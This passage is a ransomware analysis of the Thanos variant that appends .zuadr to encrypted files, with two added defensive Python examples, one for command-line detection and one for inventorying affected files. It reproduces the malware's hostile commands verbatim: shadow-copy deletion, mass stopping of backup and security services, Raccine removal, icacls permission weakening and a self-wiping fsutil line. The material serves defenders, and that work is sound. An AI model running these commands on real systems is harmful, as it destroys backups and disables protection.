Ransom.MSIL.THANOS.FAIM

 Analysis by: Thea Patrice Tajonera

 ALIASES:

Trojan-Ransom.Thanos (IKARUS); HEUR:Trojan-Ransom.MSIL.Encoder.gen (KASPERSKY)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Ransomware

  • Destructiveness: No

  • Encrypted: Yes

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes then deletes itself afterward.

It deletes registry keys related to antivirus programs. Doing this allows this malware to execute its routines without being detected by installed antivirus programs.

It encrypts files with specific file extensions. It drops files as ransom notes. It avoids encrypting files with certain file extensions.

  TECHNICAL DETAILS

File Size:

108,544 bytes

File Type:

EXE

Memory Resident:

Yes

Initial Samples Received Date:

18 Feb 2021

Payload:

Displays message/message boxes, Encrypts files, Terminates processes, Compromises system security

Arrival Details

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Ransomware drops the following files:

  • %System%\UserName={Username}_MachineName={Machine Name}_{Volume Serial Number}.txt -> contains the machine's IP, the date of encryption and unique identifier key
  • %User Startup%\mystartup.lnk -> points to the created ransom note

(Note: %System% is the Windows system folder, which is usually C:\Windows\System32 on all Windows operating system versions. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, C:\Documents and Settings\{User name}\Start Menu\Programs\Startup on Windows 2003(32-bit), XP and 2000(32-bit), or C:\Users\{user name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit), 10(64-bit).)

It adds the following processes:

  • "taskkill" /F /IM RaccineSettings.exe
  • "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  • "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  • "reg" delete HKCU\Software\Raccine /F
  • "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  • "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  • "cmd.exe" /c rd /s /q D:\$Recycle.bin
  • "%System%\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "{Malware Path}\{Malware Filename}.exe
  • "sc.exe" config Dnscache start= auto;
  • "sc.exe" config FDResPub start= auto;
  • "sc.exe" config SSDPSRV start= auto;
  • "sc.exe" config upnphost start= auto;
  • "sc.exe" config SQLTELEMETRY start= disabled;
  • "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled;
  • "sc.exe" config SQLWriter start= disabled;
  • "sc.exe" config SstpSvc start= disabled;
  • "net.exe" start Dnscache /y;
  • "net.exe" start FDResPub /y;
  • "net.exe" start SSDPSRV /y;
  • "net.exe" start upnphost /y;
  • "net.exe" stop avpsus /y;
  • "net.exe" stop McAfeeDLPAgentService /y;
  • "net.exe" stop mfewc /y;
  • "net.exe" stop BMR Boot Service /y;
  • "net.exe" stop NetBackup BMR MTFTP Service /y;
  • "net.exe" stop DefWatch /y;
  • "net.exe" stop ccEvtMgr /y;
  • "net.exe" stop ccSetMgr /y;
  • "net.exe" stop SavRoam /y;
  • "net.exe" stop RTVscan /y;
  • "net.exe" stop QBFCService /y;
  • "net.exe" stop QBIDPService /y;
  • "net.exe" stop Intuit.QuickBooks.FCS /y;
  • "net.exe" stop QBCFMonitorService /y;
  • "net.exe" stop YooBackup /y;
  • "net.exe" stop YooIT /y;
  • "net.exe" stop zhudongfangyu /y;
  • "net.exe" stop stc_raw_agent /y;
  • "net.exe" stop VSNAPVSS /y;
  • "net.exe" stop VeeamTransportSvc /y;
  • "net.exe" stop VeeamDeploymentService /y;
  • "net.exe" stop VeeamNFSSvc /y;
  • "net.exe" stop veeam /y;
  • "net.exe" stop PDVFSService /y;
  • "net.exe" stop BackupExecVSSProvider /y;
  • "net.exe" stop BackupExecAgentAccelerator /y;
  • "net.exe" stop BackupExecAgentBrowser /y;
  • "net.exe" stop bedbg /y;
  • "net.exe" stop MSSQL$SQL_2008 /y;
  • "net.exe" stop EhttpSrv /y;
  • "net.exe" stop MMS /y;
  • "net.exe" stop MSSQL$SQLEXPRESS /y;
  • "net.exe" stop ekrn /y;
  • "net.exe" stop mozyprobackup /y;
  • "net.exe" stop BackupExecDiveciMediaService /y;
  • "net.exe" stop “SQL Backups /y;
  • "net.exe" stop MSSQL$SYSTEM_BGC /y;
  • "net.exe" stop EPSecurityService /y;
  • "net.exe" stop MSSQL$VEEAMSQL2008R2 /y;
  • "net.exe" stop MSSQL$TPS /y;
  • "net.exe" stop EPUpdateService /y;
  • "net.exe" stop ntrtscan /y;
  • "net.exe" stop MSSQL$TPSAMA /y;
  • "net.exe" stop EsgShKernel /y;
  • "net.exe" stop PDVFSService /y;
  • "net.exe" stop MSSQL$VEEAMSQL2008R2 /y;
  • "net.exe" stop ESHASRV /y;
  • "net.exe" stop SDRSVC /y;
  • "net.exe" stop MSSQL$VEEAMSQL2012 /y;
  • "net.exe" stop FA_Scheduler /y;
  • "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y;
  • "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y;
  • "net.exe" stop KAVFS /y;
  • "net.exe" stop BackupExecJobEngine /y;
  • "net.exe" stop MsDtsServer100 /y;
  • "net.exe" stop NetMsmqActivator /y;
  • "net.exe" stop MSExchangeIS /y;
  • "net.exe" stop “Sophos AutoUpdate Service” /y;
  • "net.exe" stop SamSs /y;
  • "net.exe" stop ReportServer /y;
  • "net.exe" stop “SQLsafe Backup Service” /y;
  • "net.exe" stop MsDtsServer110 /y;
  • "net.exe" stop POP3Svc /y;
  • "net.exe" stop MSExchangeMGMT /y;
  • "net.exe" stop “Sophos Clean Service” /y;
  • "net.exe" stop SMTPSvc /y;
  • "net.exe" stop ReportServer$SQL_2008 /y;
  • "net.exe" stop “SQLsafe Filter Service” /y;
  • "net.exe" stop SQLWriter /y;
  • "net.exe" stop BackupExecManagementService /y;
  • "net.exe" stop BackupExecRPCService /y;
  • "net.exe" stop AcrSch2Svc /y;
  • "net.exe" stop AcronisAgent /y;
  • "net.exe" stop msftesql$PROD /y;
  • "net.exe" stop SstpSvc /y;
  • "net.exe" stop MSExchangeMTA /y;
  • "net.exe" stop “Sophos Device Control Service” /y;
  • "net.exe" stop ReportServer$SYSTEM_BGC /y;
  • "net.exe" stop “Symantec System Recovery” /y;
  • "net.exe" stop MSOLAP$SQL_2008 /y;
  • "net.exe" stop UI0Detect /y;
  • "net.exe" stop MSExchangeSA /y;
  • "net.exe" stop “Sophos File Scanner Service” /y;
  • "net.exe" stop ReportServer$TPS /y;
  • "net.exe" stop “Veeam Backup Catalog Data Service” /y;
  • "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y;
  • "net.exe" stop CASAD2DWebSvc /y;
  • "net.exe" stop MSOLAP$SYSTEM_BGC /y;
  • "net.exe" stop KAVFSGT /y;
  • "net.exe" stop CAARCUpdateSvc /y;
  • "net.exe" stop W3Svc /y;
  • "net.exe" stop VeeamBackupSvc /y;
  • "net.exe" stop sophos /y;
  • "net.exe" stop MSExchangeSRS /y;
  • "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y;
  • "net.exe" stop kavfsslp /y;
  • "net.exe" stop VeeamBrokerSvc /y;
  • "net.exe" stop MSSQLFDLauncher$SQL_2008 /y;
  • "net.exe" stop klnagent /y;
  • "net.exe" stop VeeamCatalogSvc /y;
  • "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y;
  • "net.exe" stop macmnsvc /y;
  • "net.exe" stop VeeamCloudSvc /y;
  • "net.exe" stop MSSQLFDLauncher$TPS /y;
  • "net.exe" stop masvc /y;
  • "net.exe" stop VeeamDeploymentService /y;
  • "net.exe" stop MSSQLFDLauncher$TPSAMA /y;
  • "net.exe" stop MBAMService /y;
  • "net.exe" stop VeeamDeploySvc /y;
  • "net.exe" stop MSSQLSERVER /y;
  • "net.exe" stop MBEndpointAgent /y;
  • "net.exe" stop VeeamEnterpriseManagerSvc /y;
  • "net.exe" stop MSSQLServerADHelper /y;
  • "net.exe" stop McAfeeEngineService /y;
  • "net.exe" stop VeeamHvIntegrationSvc /y;
  • "net.exe" stop MSSQLServerADHelper100 /y;
  • "net.exe" stop McAfeeFramework /y;
  • "net.exe" stop VeeamMountSvc /y;
  • "net.exe" stop MSSQLServerOLAPService /y;
  • "net.exe" stop McAfeeFrameworkMcAfeeFramework /y;
  • "net.exe" stop VeeamNFSSvc /y;
  • "net.exe" stop MySQL57 /y;
  • "net.exe" stop McShield /y;
  • "net.exe" stop VeeamRESTSvc /y;
  • "net.exe" stop MySQL80 /y;
  • "net.exe" stop McTaskManager /y;
  • "net.exe" stop “Acronis VSS Provider” /y;
  • "net.exe" stop “Sophos Health Service” /y;
  • "net.exe" stop VeeamTransportSvc /y;
  • "net.exe" stop MsDtsServer /y;
  • "net.exe" stop ReportServer$TPSAMA /y;
  • "net.exe" stop OracleClientCache80 /y;
  • "net.exe" stop IISAdmin /y;
  • "net.exe" stop “Zoolz 2 Service” /y;
  • "net.exe" stop mfefire /y;
  • "net.exe" stop MSExchangeES /y;
  • "net.exe" stop MSOLAP$TPS /y;
  • "net.exe" stop wbengine /y;
  • "net.exe" stop “Sophos Agent” /y;
  • "net.exe" stop “aphidmonitorservice” /y;
  • "net.exe" stop ReportServer$SQL_2008 /y;
  • ;"net.exe" stop EraserSvc11710 /y;
  • "net.exe" stop msexchangeadtopology /y;
  • "net.exe" stop mfemms /y;
  • "net.exe" stop “Enterprise Client Service” /y;
  • "net.exe" stop “Sophos MCS Agent” /y;
  • "net.exe" stop wbengine /y;
  • "net.exe" stop SepMasterService /y;
  • "net.exe" stop MSSQL$ECWDB2 /y;
  • "net.exe" stop AcrSch2Svc /y;
  • "net.exe" stop MSOLAP$TPSAMA /y;
  • "net.exe" stop RESvc /y;
  • "net.exe" stop SQLAgent$PRACTTICEMGT /y;
  • "net.exe" stop audioendpointbuilder /y;
  • "net.exe" stop “intel(r) proset monitoring service” /y;
  • "net.exe" stop mfevtp /y;
  • "net.exe" stop sms_site_sql_backup /y;
  • "net.exe" stop SQLAgent$BKUPEXEC /y;
  • "net.exe" stop MSSQL$SOPHOS /y;
  • "net.exe" stop SQLAgent$CITRIX_METAFRAME /y;
  • "net.exe" stop sacsvr /y;
  • "net.exe" stop SQLAgent$CXDB /y;
  • "net.exe" stop SAVAdminService /y;
  • "net.exe" stop SQLAgent$ECWDB2 /y;
  • "net.exe" stop SAVService /y;
  • "net.exe" stop SQLAgent$PRACTTICEBGC /y;
  • "net.exe" stop SQLAgent$PROD /y;
  • "net.exe" stop Smcinst /y;
  • "net.exe" stop SQLAgent$PROFXENGAGEMENT /y;
  • "net.exe" stop SmcService /y;
  • "net.exe" stop SQLAgent$SBSMONITORING /y;
  • "net.exe" stop SntpService /y;
  • "net.exe" stop ShMonitor /y;
  • "net.exe" stop “Sophos Safestore Service” /y;
  • "net.exe" stop msexchangeimap4 /y;
  • "net.exe" stop SQLAgent$SHAREPOINT /y;
  • "net.exe" stop SQLAgent$TPSAMA /y;
  • "net.exe" stop BackupExecAgentBrowser /y;
  • "net.exe" stop “Sophos MCS Client” /y;
  • "net.exe" stop sophossps /y;
  • "net.exe" stop swi_update /y;
  • "net.exe" stop MSSQL$PRACTICEMGT /y;
  • "net.exe" stop ARSM /y;
  • "net.exe" stop SQLAgent$SQL_2008 /y;
  • "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y;
  • "net.exe" stop “Sophos System Protection Service” /y;
  • "net.exe" stop MSSQL$BKUPEXEC /y;
  • "net.exe" stop SQLAgent$SOPHOS /y;
  • "net.exe" stop swi_update_64 /y;
  • "net.exe" stop BackupExecDeviceMediaService /y;
  • "net.exe" stop unistoresvc_1af40a /y;
  • "net.exe" stop SQLAgent$SQLEXPRESS /y;
  • "net.exe" stop SQLAgent$VEEAMSQL2012 /y;
  • "net.exe" stop MSSQL$PRACTTICEBGC /y;
  • "net.exe" stop “Sophos Message Router” /y;
  • "net.exe" stop BackupExecAgentAccelerator /y;
  • "net.exe" stop MSSQL$SBSMONITORING /;
  • "net.exe" stop MSSQL$SBSMONITORING /y;
  • "net.exe" stop AVP /y;
  • "net.exe" stop BackupExecVSSProvider /y;
  • "net.exe" stop MSSQL$SHAREPOINT /y;
  • "net.exe" stop DCAgent /y;
  • "net.exe" stop SQLTELEMETRY /y;
  • "net.exe" stop TrueKeyServiceHelper /y;
  • "net.exe" stop svcGenericHost /y;
  • "net.exe" stop TmCCSF /y;
  • "net.exe" stop “Sophos Web Control Service” /y;
  • "net.exe" stop SQLTELEMETRY$ECWDB2 /y;
  • "net.exe" stop SQLAgent$SYSTEM_BGC /y;
  • "net.exe" stop SQLBrowser /y;
  • "net.exe" stop BackupExecJobEngine /y;
  • "net.exe" stop MSSQL$PROD /y;
  • "net.exe" stop AcronisAgent /y;
  • "net.exe" stop BackupExecManagementService /y;
  • "net.exe" stop MSSQL$PROFXENGAGEMENT /y;
  • "net.exe" stop Antivirus /y;
  • "net.exe" stop BackupExecRPCService /y;
  • "net.exe" stop WRSVC /y;
  • "net.exe" stop swi_filter /y;
  • "net.exe" stop tmlisten /y;
  • "net.exe" stop mssql$vim_sqlexp /y;
  • "net.exe" stop SQLAgent$TPS /y;
  • "net.exe" stop swi_service /y;
  • "net.exe" stop SQLSafeOLRService /y;
  • "net.exe" stop vapiendpoint /y;
  • "net.exe" stop TrueKey /y;
  • "net.exe" stop SQLSERVERAGENT /y;
  • "net.exe" stop TrueKeyScheduler /y;
  • "taskkill.exe" /IM mspub.exe /F;
  • "taskkill.exe" /IM synctime.exe /F;
  • "taskkill.exe" /IM mydesktopqos.exe /F;
  • "taskkill.exe" /IM mydesktopservice.exe /F;
  • "taskkill.exe" /IM Ntrtscan.exe /F;
  • "taskkill.exe" /IM sqbcoreservice.exe /F;
  • "taskkill.exe" /IM mysqld.exe /F;
  • "taskkill.exe" /IM isqlplussvc.exe /F;
  • "taskkill.exe" /IM firefoxconfig.exe /F;
  • "taskkill.exe" /IM excel.exe /F;
  • "taskkill.exe" /IM CNTAoSMgr.exe /F;
  • "taskkill.exe" /IM sqlwriter.exe /F;
  • "taskkill.exe" /IM tbirdconfig.exe /F;
  • "taskkill.exe" /IM agntsvc.exe /F;
  • "taskkill.exe" /IM onenote.exe /F;
  • "taskkill.exe" /IM PccNTMon.exe /F;
  • "taskkill.exe" /IM msaccess.exe /F;
  • "taskkill.exe" /IM outlook.exe /F;
  • "taskkill.exe" /IM tmlisten.exe /F;
  • "taskkill.exe" /IM msftesql.exe /F;
  • "taskkill.exe" /IM powerpnt.exe /F;
  • "taskkill.exe" /IM mydesktopqos.exe /F;
  • "taskkill.exe" /IM visio.exe /F;
  • "taskkill.exe" /IM mydesktopservice.exe /F;
  • "taskkill.exe" /IM winword.exe /F;
  • "taskkill.exe" /IM mysqld-nt.exe /F;
  • "taskkill.exe" /IM wordpad.exe /F;
  • "taskkill.exe" /IM dbeng50.exe /F;
  • "taskkill.exe" /IM thebat.exe /F;
  • "taskkill.exe" /IM steam.exe /F;
  • "taskkill.exe" /IM encsvc.exe /F;
  • "taskkill.exe" /IM mysqld-opt.exe /F;
  • "taskkill.exe" /IM thebat64.exe /F;
  • "taskkill.exe" /IM xfssvccon.exe /F;
  • "taskkill.exe" /IM ocautoupds.exe /F;
  • "taskkill.exe" /IM ocomm.exe /F;
  • "taskkill.exe" /IM ocssd.exe /F;
  • "taskkill.exe" /IM infopath.exe /F;
  • "taskkill.exe" /IM mbamtray.exe /F;
  • "taskkill.exe" /IM zoolz.exe /F;
  • "taskkill.exe" /IM oracle.exe /F;
  • "taskkill.exe" IM thunderbird.exe /F;
  • "taskkill.exe" /IM dbsnmp.exe /F;
  • "taskkill.exe" /IM sqlagent.exe /F;
  • "taskkill.exe" /IM sqlbrowser.exe /F;
  • "taskkill.exe" /IM sqlservr.exe /F;
  • "icacls" "C:*" /grant Everyone:F /T /C /Q
  • "icacls" "D:*" /grant Everyone:F /T /C /Q
  • "icacls" "Z:*" /grant Everyone:F /T /C /Q
  • "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  • "cmd.exe" /c net view
  • "%System%\mshta.exe" %Desktop%\RESTORE_FILES_INFO.hta

(Note: %System% is the Windows system folder, which is usually C:\Windows\System32 on all Windows operating system versions. %Desktop% is the current user's desktop, which is usually C:\Documents and Settings\{User Name}\Desktop on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\Desktop on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It executes then deletes itself afterward.
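The process list above is what a defender actually sees in process-creation telemetry (Sysmon Event ID 1 or Security 4688 CommandLine fields). The following is an added example, not Trend Micro's code, of detection logic that classifies such command lines into the behaviours the report documents: Raccine removal, Recycle Bin purge, icacls ACL weakening, WMI shadow copy deletion, the fsutil/Del self-wipe, and the long run of "net.exe stop ... /y" against backup, database and security services. The sample events are constructed to mirror the report's lines plus two benign ones; the service-name markers and the burst threshold of three distinct sensitive services are assumptions chosen for the example.

```python
import re

# Constructed sample process-creation command lines (the CommandLine field of a
# Sysmon Event ID 1 or Security 4688 record). They mirror commands listed in
# the report plus two benign lines; none are captured from a real host.
SAMPLE_EVENTS = [
    '"taskkill" /F /IM RaccineSettings.exe',
    '"reg" delete HKCU\\Software\\Raccine /F',
    '"schtasks" /DELETE /TN "Raccine Rules Updater" /F',
    '"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin',
    '"net.exe" stop VeeamBackupSvc /y;',
    '"net.exe" stop MSSQLSERVER /y;',
    '"net.exe" stop SAVService /y;',
    '"net.exe" stop McShield /y;',
    '"icacls" "C:*" /grant Everyone:F /T /C /Q',
    '"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }',
    '"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 '
    'length=524288 "sample.exe" & Del /f /q "sample.exe"',
    '"net.exe" stop Spooler /y',                      # benign: must not fire
    '"notepad.exe" C:\\Users\\alice\\notes.txt',      # benign: must not fire
]

# Name fragments of the backup, database and security services the report
# shows being stopped (assumed list for this example); compared
# case-insensitively against the service argument of "net stop".
SENSITIVE_SERVICE_MARKERS = (
    "veeam", "backupexec", "acronis", "mssql", "sqlagent", "sophos", "mcafee",
    "mcshield", "sav", "kav", "avp", "mbam", "wbengine", "sdrsvc", "vss",
)

_NET_STOP = re.compile(r'"?net(?:\.exe)?"?\s+stop\s+("?)(.+?)\1\s*/y', re.IGNORECASE)


def stopped_service(cmd):
    """Return the lower-cased service name from a 'net stop <svc> /y' line, else None."""
    m = _NET_STOP.search(cmd)
    return m.group(2).lower() if m else None


def _sensitive_stop(c):
    svc = stopped_service(c)
    return svc is not None and any(marker in svc for marker in SENSITIVE_SERVICE_MARKERS)


# Each rule is (name, predicate over the lower-cased command line). The rules
# track behaviours in the report's process list: Raccine removal, Recycle Bin
# purge, ACL weakening, shadow copy deletion, self-wipe, and service stops.
RULES = [
    ("raccine_tampering", lambda c: "raccine" in c),
    ("recycle_bin_purge", lambda c: re.search(r"\brd\s+/s\s+/q\s+\S*\$recycle\.bin", c) is not None),
    ("acl_weakening", lambda c: "icacls" in c and re.search(r"/grant\s+everyone:f\b", c) is not None),
    ("shadow_copy_deletion", lambda c: "win32_shadowcopy" in c and "delete" in c),
    ("self_wipe", lambda c: "fsutil file setzerodata" in c and re.search(r"\bdel\s+/f", c) is not None),
    ("sensitive_service_stop", _sensitive_stop),
]


def classify(cmd):
    """Return the names of every rule a single command line triggers."""
    c = cmd.lower()
    return [name for name, pred in RULES if pred(c)]


def triage(events, stop_burst_threshold=3):
    """Classify a batch of command lines. Returns (hits, burst): hits maps each
    flagged command to its rule names; burst is True when at least
    stop_burst_threshold distinct sensitive services were stopped in the batch,
    which is the pattern the report's long run of "net.exe stop ... /y" produces."""
    hits = {}
    stopped = set()
    for cmd in events:
        names = classify(cmd)
        if names:
            hits[cmd] = names
        if "sensitive_service_stop" in names:
            stopped.add(stopped_service(cmd))
    return hits, len(stopped) >= stop_burst_threshold


if __name__ == "__main__":
    flagged, burst = triage(SAMPLE_EVENTS)
    for cmd, names in flagged.items():
        print(f"{', '.join(names):24} {cmd}")
    print("sensitive service-stop burst:", burst)
```

Any single "net stop" of a backup agent is noisy on its own; the burst count across a short batch is what separates this routine from routine administration, which is why `triage` tracks distinct stopped services rather than firing per line.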

It adds the following mutexes to ensure that only one of its copies runs at any one time:

  • af1565f9-32ee-4d2e-bd3d-c27df873f7e2

It terminates itself if it finds the following processes in the affected system's memory:

  • CFF Explorer
  • de4dot
  • dnspy
  • dnspy-x86
  • dotpeek
  • dotpeek64
  • dumpcap
  • effetech http sniffer
  • fiddler
  • firesheep
  • http analyzer stand-alone
  • HTTPNetworkSniffer
  • ida64
  • IEWatch Professional
  • ilspy
  • intercepter
  • Intercepter-NG
  • LordPE
  • MegaDumper
  • NetworkMiner
  • NetworkTrafficView
  • NoFuserEx
  • ollydbg
  • PEiD
  • pe-sieve
  • procexp
  • procexp64
  • protection_id
  • RDG Packer Detector
  • sysinternals tcpview
  • tcpdump
  • UnConfuserEx
  • Universal_Fixer
  • wireshark
  • wireshark portable
  • x32dbg
  • x64dbg

Other System Modifications

This Ransomware modifies the following registry entries:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    LocalAccountTokenFilterPolicy = 1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLinkedConnections = 1
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\FileSystem
    LongPathsEnabled = 1

It deletes the following registry keys related to antivirus and security applications:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
  • HKEY_LOCAL_MACHINE\SOFTWARE\Raccine
  • HKEY_CURRENT_USER\SOFTWARE\Raccine

Other Details

This Ransomware does the following:

  • This ransomware requires administrative rights to proceed with its intended routine
  • It affects all existing drives of the affected machine
  • It empties out the Recycle Bin
  • This ransomware deletes the following subkeys from under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:
    • vssadmin.exe
    • wmic.exe
    • wbadmin.exe
    • bcdedit.exe
    • powershell.exe
    • diskshadow.exe
    • net.exe
  • Kills processes with large private memory space if their process name is not one of the following:
    • {Malware name}
    • chrome
    • opera
    • msedge
    • iexplore
    • firefox
    • explorer
    • winint
    • winlogon

It executes the following commands to gain access to the network configuration settings of the system:

  • "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  • "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  • "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  • "arp" -a
  • "net.exe" use \{IP Address}
  • "net.exe" use \{Subnet Mask}
  • "net.exe" use \{Default Gateway}

Ransomware Routine

This Ransomware encrypts files with the following extensions:

  • 7z
  • accdb
  • aes
  • aiff
  • asm
  • avi
  • backup
  • bak
  • bz2
  • cert
  • class
  • cpp
  • cs
  • csr
  • csv
  • dat
  • dbf
  • dim
  • djvu
  • doc
  • docm
  • docx
  • dtsx
  • dwg
  • edb
  • eml
  • flac
  • gif
  • gpg
  • htm
  • html
  • hwp
  • java
  • jpeg
  • jpg
  • key
  • lay6
  • ldf
  • lgb
  • m4a
  • mdb
  • mdf
  • mkv
  • mov
  • mp3
  • mp4
  • mpeg
  • mrimg
  • msg
  • myd
  • nd
  • ndf
  • nef
  • odb
  • odg
  • ods
  • odt
  • ora
  • ost
  • p12
  • pas
  • pdf
  • pem
  • pfx
  • php
  • png
  • ppt
  • pptx
  • psd
  • pst
  • qbb
  • qbw
  • rar
  • raw
  • rdl
  • rtf
  • sql
  • sqlite3
  • sqlitedb
  • svg
  • sxi
  • sxw
  • tar
  • tiff
  • tlg
  • txt
  • vdi
  • vmdk
  • vmx
  • vsd
  • wav
  • xdw
  • xls
  • xlsm
  • xlsx
  • zip

It avoids encrypting files with the following strings in their file name:

  • autoexec.bat
  • desktop.ini
  • autorun.inf
  • ntuser.dat
  • iconcache.db
  • bootsect.bak
  • boot.ini
  • ntuser.dat.log
  • thumbs.db
  • bootmgr
  • pagefile.sys
  • config.sys
  • ntuser.ini
  • Builder_Log
  • RSAKeys
  • Recycle Bin
  • RESTORE_FILES_INFO
  • UserName={Username}_MachineName={Machine Name}_{Volume Serial Number}.txt

It avoids encrypting files with the following strings in their file path:

  • Program Files
  • Windows
  • Perflogs
  • Internet Explorer
  • ProgramData
  • AppData

It appends the following extension to the file name of the encrypted files:

  • {Original Filename}.{Original Extension}.zuadr

It drops the following file(s) as ransom note:

  • %User Temp%\RESTORE_FILES_INFO.txt
  • {Encrypted Directory}\RESTORE_FILES_INFO.txt
  • %Desktop%\RESTORE_FILES_INFO.txt
  • %Desktop%\RESTORE_FILES_INFO.hta

It avoids encrypting files with the following file extensions:

  • .exe
  • .dll
  • .EXE
  • .DLL
  • .zuadr
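The Ransomware Routine section gives everything an incident responder needs to inventory an affected host: the appended .zuadr extension, the RESTORE_FILES_INFO.txt/.hta note names, and the UserName=..._MachineName=..._{Volume Serial Number}.txt marker file. The following is an added example, not Trend Micro's code, that walks a directory tree, collects those artefacts, and pairs each encrypted file with the original name to look for in backups (the report's Step 8). The directory layout, file names and marker values it builds under a temporary directory are constructed for the demonstration.

```python
import os
import shutil
import tempfile
from collections import defaultdict

ENCRYPTED_EXT = ".zuadr"                      # extension the report says is appended
NOTE_NAMES = {"restore_files_info.txt", "restore_files_info.hta"}
MARKER_PREFIX = "username="                   # start of the dropped UserName=..._MachineName=... file


def scan_tree(root):
    """Walk root and collect the on-disk evidence the report describes:
    encrypted files, ransom notes, the marker file, and how many encrypted
    files each directory holds."""
    found = {"encrypted": [], "notes": [], "markers": [], "dirs_hit": defaultdict(int)}
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            low = name.lower()
            if low.endswith(ENCRYPTED_EXT):
                found["encrypted"].append(path)
                found["dirs_hit"][dirpath] += 1
            elif low in NOTE_NAMES:
                found["notes"].append(path)
            elif low.startswith(MARKER_PREFIX) and low.endswith(".txt"):
                found["markers"].append(path)
    found["dirs_hit"] = dict(found["dirs_hit"])
    return found


def original_name(path):
    """Recover the pre-encryption name: the report gives the scheme
    {Original Filename}.{Original Extension}.zuadr, so only the last
    extension is stripped. Paths without the extension are returned unchanged."""
    return path[:-len(ENCRYPTED_EXT)] if path.lower().endswith(ENCRYPTED_EXT) else path


def recovery_inventory(found):
    """Pair each encrypted file with the name to look for in backups (Step 8)."""
    return [(p, original_name(p)) for p in found["encrypted"]]


def build_sample_tree(root):
    """Create a constructed post-infection layout under root. Names follow the
    report; the marker file's user, host and serial values are made up."""
    layout = {
        "Documents": ["report.docx.zuadr", "budget.xlsx.zuadr", "desktop.ini", "RESTORE_FILES_INFO.txt"],
        "Pictures": ["holiday.jpg.zuadr", "RESTORE_FILES_INFO.txt"],
        "Desktop": ["RESTORE_FILES_INFO.txt", "RESTORE_FILES_INFO.hta"],
        "System32": ["UserName=alice_MachineName=WS01_1A2B3C4D.txt"],
        os.path.join("Program Files", "app"): ["app.exe"],   # skipped path: stays untouched
    }
    for sub, names in layout.items():
        directory = os.path.join(root, sub)
        os.makedirs(directory, exist_ok=True)
        for name in names:
            with open(os.path.join(directory, name), "wb") as fh:
                fh.write(b"placeholder")


def demo():
    """Build the sample tree in a temporary directory, scan it, and return
    the count of each finding type; the directory is removed afterwards."""
    root = tempfile.mkdtemp(prefix="zuadr_triage_")
    try:
        build_sample_tree(root)
        found = scan_tree(root)
        return {key: len(value) for key, value in found.items()}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())   # {'encrypted': 3, 'notes': 4, 'markers': 1, 'dirs_hit': 2}
```

Running `scan_tree` against a real volume gives the per-directory hit counts that scope the restore, and `recovery_inventory` gives the exact pre-encryption names to request from backup, since the malware leaves the original name and extension intact under the appended one.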

  SOLUTION

Minimum Scan Engine:

9.800

FIRST VSAPI PATTERN FILE:

16.626.04

FIRST VSAPI PATTERN DATE:

30 Mar 2021

VSAPI OPR PATTERN File:

16.627.00

VSAPI OPR PATTERN Date:

31 Mar 2021

Step 1

Trend Micro Predictive Machine Learning detects and blocks malware at the first sign of its existence, before it executes on your system. When enabled, your Trend Micro product detects this malware under the following machine learning name:

  • Troj.Win32.TRX.XXPE50FFF041

Step 2

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 3

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 4

Restart in Safe Mode


Step 5

Restore this modified registry value


Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how to, or ask your system administrator for assistance. Otherwise, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    • From: LocalAccountTokenFilterPolicy = "1"
